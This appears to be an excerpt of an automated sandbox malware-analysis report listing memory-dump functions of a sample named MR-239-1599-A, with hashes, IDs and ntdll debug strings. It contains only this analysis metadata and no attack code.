                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9451ef42e1ef4dad938c9c1abfd544d27ec15acb106dde997aa26a94c8d99a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9090023160140043414071A988449064055BBE1225759C521A0998950DC5E989655765
                                                                                                                                                                                                          Function 01532FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                                                                                                                                                                                          • Instruction ID: 5a4c67210972dbc836dedc3a37680cc28150c4adab42d8af3d141ba847c901c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C290023120180403D100719948087470055A7D0316F59C411A5164955EC6F5C9916631
                                                                                                                                                                                                          Function 01532E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                                                                                                                                                                                          • Instruction ID: 8d94845bbcc97e0b125d782bc69cc32a427e89d7b3416d57ded7426f1e6ce8c6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4790023130140403D102719944146060059E7D1359F99C412E1424955DC6B58A53A232
                                                                                                                                                                                                          Function 01532EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                                                                                                                                                                                          • Instruction ID: b73b4b48b427aa1d7af0b3639e826cb926349d654e64a3a6f27f7f8d5d53be1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1390027120180403D140759948046070055A7D0316F59C411A2064955ECAB98D516235
                                                                                                                                                                                                          Function 01532E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                                                                                                                                                                                          • Instruction ID: a844e6f76e7ebaef0266ec345ef665db80f016217284d01852bc1adf11dd466e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D890023160140503D10171994404616005AA7D0255F99C422A1024955ECAB58A92A231
                                                                                                                                                                                                          Function 01532EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                                                                                                                                                                                          • Instruction ID: 39f8054a37a0d0cbd5c30ba128a0e6e1febf8d840cb2866dc412f1602f485457
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF90027120140403D140719944047460055A7D0315F59C411A5064954EC6E98ED56765
                                                                                                                                                                                                          Function 01533010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a56c6f77623d0d786d7c89ae71fe9c337596938bed93e39745b40db6057a101c
                                                                                                                                                                                                          • Instruction ID: a5a8c70b0648bb29f16fe96433c8cceb52d048790cf040456199e88bebcaba26
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56c6f77623d0d786d7c89ae71fe9c337596938bed93e39745b40db6057a101c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4090023120184443D14072994804B0F4155A7E1216F99C419A4156954CC9A589555721
                                                                                                                                                                                                          Function 01533090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: def71577a9a796f5e704b0fc71daaa7f8cf9f7db415c873377f11cdaedb063dd
                                                                                                                                                                                                          • Instruction ID: fabc9740abc6306d8f5bb85000e0da2a517ca0b0860eb6da8376f3e319dac27b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: def71577a9a796f5e704b0fc71daaa7f8cf9f7db415c873377f11cdaedb063dd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0390023124140803D140719984147070056E7D0615F59C411A0024954DC6A68A6567B1
                                                                                                                                                                                                          Function 015339B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: de7a5e78bfa21230af46a35be8b69a04ef0d7745ae44c45e2deabda97c0243db
                                                                                                                                                                                                          • Instruction ID: 1852ba46daa2c592589427e5c3560535dc3741588a292bc909068ee402c94b27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de7a5e78bfa21230af46a35be8b69a04ef0d7745ae44c45e2deabda97c0243db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D90023124545103D150719D44046164055B7E0215F59C421A0814994DC5E589556321
                                                                                                                                                                                                          Function 01533D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 14d70ac106244f4777f2a590a2704a9d33789278be9838909c4653ca7c10b140
                                                                                                                                                                                                          • Instruction ID: b990b11291b6e58753f160f9ba4b503356e0dab5d48422f4de7f3523ce7f2d30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14d70ac106244f4777f2a590a2704a9d33789278be9838909c4653ca7c10b140
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B390023520140403D510719958046460096A7D0315F59D811A0424958DC6E489A1A221
                                                                                                                                                                                                          Function 01533D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 071130b5fdc322a12d8d56f0eac45a1f3dc3d5ddb1335c1be739843f488fe58b
                                                                                                                                                                                                          • Instruction ID: 0ab6ce557ed1453729764cdfce5cd61724e403f11a52b0a856b47fffc5983293
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071130b5fdc322a12d8d56f0eac45a1f3dc3d5ddb1335c1be739843f488fe58b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1990023120240143954072995804A4E4155A7E1316B99D815A0015954CC9A489615321
                                                                                                                                                                                                          Function 01532C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                          • Instruction ID: 6a8899b29ee5945409ade4dda7fed24e4f90c2e931537a97f86fb5cb3b045d57
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                          Function 01532890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                                                                                                                                                          • Instruction ID: 5fdbe60b8d417ca86b0fccf43c60983931be86f4663a9bf4e3a2edd525087bfd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A51E5B6A00616AFCB11DF9C889097EFBF8BB98240B508569F569DB641D334DE418BE0
                                                                                                                                                                                                          Function 015A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 73dd3479c3f0207fe9404a57fc46fd14a8a562ab441d59f757bc4be1a72dc270
                                                                                                                                                                                                          • Instruction ID: 78a420a5db316f060567d74eae7e37aa4e0756bd4339a56cbcff012d02865ef5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73dd3479c3f0207fe9404a57fc46fd14a8a562ab441d59f757bc4be1a72dc270
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51512971A40646AFCB31DF5DC8919BFBBF9FB48200F94885AE5D6CF641E674DA008760
                                                                                                                                                                                                          Function 01527630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 015646A0
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01564655
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01564787
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015646FC
                                                                                                                                                                                                          • Execute=1, xrefs: 01564713
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01564725
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01564742
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                          • Opcode ID: 081ee6a1e8262c0a0f32743689982836778e6eb1552820777a803a6abf442d1c
                                                                                                                                                                                                          • Instruction ID: 1c022cb7002c1238746ff6a758b27bb976a38466968e7f7ddb289d935ab70dde
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 081ee6a1e8262c0a0f32743689982836778e6eb1552820777a803a6abf442d1c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26512A3260022A7BEF21EAA8DC99FAD77A8BF6D700F14009DD605AF1D1D770AA458F50
                                                                                                                                                                                                          Function 0153B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction ID: 05b699b5cb076ce6c445900c4e8029fe034abe329a64f97bb295f365f99cefd3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB819270E052499EEF268E6CC8517FEBBB1FFC5320F18465AD851AF292C7349941CB51
                                                                                                                                                                                                          Function 015A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                                                                          • Opcode ID: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                                                                                                                                                                                          • Instruction ID: 2d5e899af9ad49df5928a2f85ae21de12377ff13635c06f2915a8933bf41c518
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121777AE0011AABDB11DF79DC41AFEBBF8FF94644F440116EA45DB240E730E9018BA1
                                                                                                                                                                                                          Function 0151F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015602E7
                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015602BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0156031E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                          • Opcode ID: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                                                                                                                                                                                          • Instruction ID: b3ebeed1ca959e17182d55fe4536d9b9309d6260f2e0cc5494d1f8ae4a3f67cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E19E706047429FE726CF28C884B2ABBE4BF84314F140A5EF5A58F2E1D774D949CB92
                                                                                                                                                                                                          Function 0152BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01567B7F
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 01567B8E
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 01567BAC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                                                          • Opcode ID: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                                                                                                                                                                                          • Instruction ID: d1d1107dd7bd9dcab591447dc8de0f572799333bc683d4c098f051d131e2b7cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1741D1367007039FD724DE29C840F6AB7E5FB99710F100A1DE9669F290EB71E4058B91
                                                                                                                                                                                                          Function 0152B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156728C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01567294
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 015672A3
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 015672C1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                                                          • Opcode ID: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                                                                                                                                                                                          • Instruction ID: 074bfb9df4aa7637b72d0769a334e396daa5e814e4c9006e95cbbf50b196546d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41C132700217ABD721DE29CC41F6AB7A5FB99714F100A19F955AF280DB31F8428BD1
                                                                                                                                                                                                          Function 015A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                                                                                                                                                                                          • Instruction ID: 4a7ed75a7cdd35dd2ffded56e4a0954b7a30b9ac73913458655ced0f9e91f28f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74316672A002199FDB20DE2DDC41BEE77F8FF55610F94455AE949EB240EB309A448BA0
                                                                                                                                                                                                          Function 01537D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction ID: 4d9628ccd1bf3f328409f9746c72f199db57eec9af04827c40cdf78f3cc01709
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E29185B1E002169FDB24DF6DC8816BEBBA5BFC8720F14461AE965EF2C0D73099409761
                                                                                                                                                                                                          Function 014F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                                                          • Opcode ID: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                                                                                                                                                                                          • Instruction ID: 31cef651dcab294f4f76408af6cce367ae088f75dffa02c2d8805af70623655a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC810A71D0026ADBDB358B54CD44BEEB7B4BB48754F0441EBAA19BB290D7709E84CFA0

